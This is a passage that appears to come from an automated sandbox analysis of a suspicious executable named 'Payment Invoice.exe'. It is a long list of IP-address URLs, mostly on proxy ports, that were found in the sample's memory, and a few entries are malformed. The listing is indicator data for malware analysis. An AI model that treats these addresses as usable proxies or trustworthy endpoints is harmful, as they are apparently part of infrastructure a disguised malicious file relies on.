                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.194.189.144:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.248.70.237:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.248.70.237:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163171F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.151.181.101:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.151.181.101:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153.92.39
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153.92.39://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153.92.39:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184F3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163184EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.6.139.190:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631863A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.6.139.190:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319835000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.202.144:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.202.144:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.129.38.21:57114://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.138.76.6:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.138.76.6:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.220.102.159:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.220.102.159:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.255.238.159
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.255.238.159://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.255.238.159:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.19.111.185
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.19.111.185://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.19.111.185:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.206.142.49:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.206.142.49:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.176.229:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.215.176.229:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.231:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.247.47.231:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163186DD000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.25.100.42:2222
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163186EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.25.100.42:2222://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.25.98.82:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.25.98.82:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.14:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.14:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.15:5050
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.152.40.15:5050://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631975D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.161.96.132
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631974B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.161.96.132://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.161.96.132:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.19.244.109:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.19.244.109:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.122:3500
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.122:3500://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.123:3501
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.123:3501://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.125:3503
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.225.72.125:3503://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.198
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.198://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.227.38.198:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.254.231.55
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.254.231.55://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.254.231.55:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.123.243:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.123.243:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.214.8:9054
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.214.8:9054://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.209.142:15673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.209.142:15673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C8A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.176.53.183:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.176.53.183:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.12:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.12:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.4:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.249.199.4:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.0.234.206:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.0.234.206:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.121.87.187
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.121.87.187://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.121.87.187:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A8C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.1.34:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.1.34:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.123.3.138:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.130.253.68:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.130.253.68:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.24.205:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.147.24.205:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.254.123.203:8443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.254.123.203:8443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.54.71.231:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.54.71.231:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.70.163.74:5314
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.70.163.74:5314://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317316000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.70.163.94:5301
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.70.163.94:5301://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.71.248.123:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.71.248.123:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.10.93.50:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.10.93.50:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.127.62.252
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.127.62.252://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.127.62.252:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.128.142.113
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.128.142.113://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.128.142.113:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.21.101.158:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.21.101.158:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.212.148.199:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.212.148.199:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.178.81
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.178.81://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.178.81:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.58.156:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.58.156:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.25.234.175:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.25.234.175:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.73.120.104:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.180.218:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.180.218:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.5.178:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.5.178:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631976F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163199B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.53.140
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.53.140://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.53.140:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.204.28.96:5432
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.204.28.96:5432://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.130.237:8192
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.130.237:8192://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.142.115:8192
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.142.115:8192://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.184.143://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.184.143:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.184.143xDm
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163199DF000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163198DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50109
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163198E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50109://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50687
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50687://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:52173
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:52173://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.158.108:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.158.108:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.63.70:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.63.70:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.44.82.2:38080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.44.82.2:38080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.29.41.58:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.29.41.58:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631724E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.30.26.177:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.30.26.177:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.79.91.3:59040
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.79.91.3:59040://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319ACC000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.83.143.6:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.83.143.6:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.84.95.189:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.84.95.189:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.85.177.170:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.85.177.170:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.84.105
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.84.105://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.84.105:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.93.157.87:21802
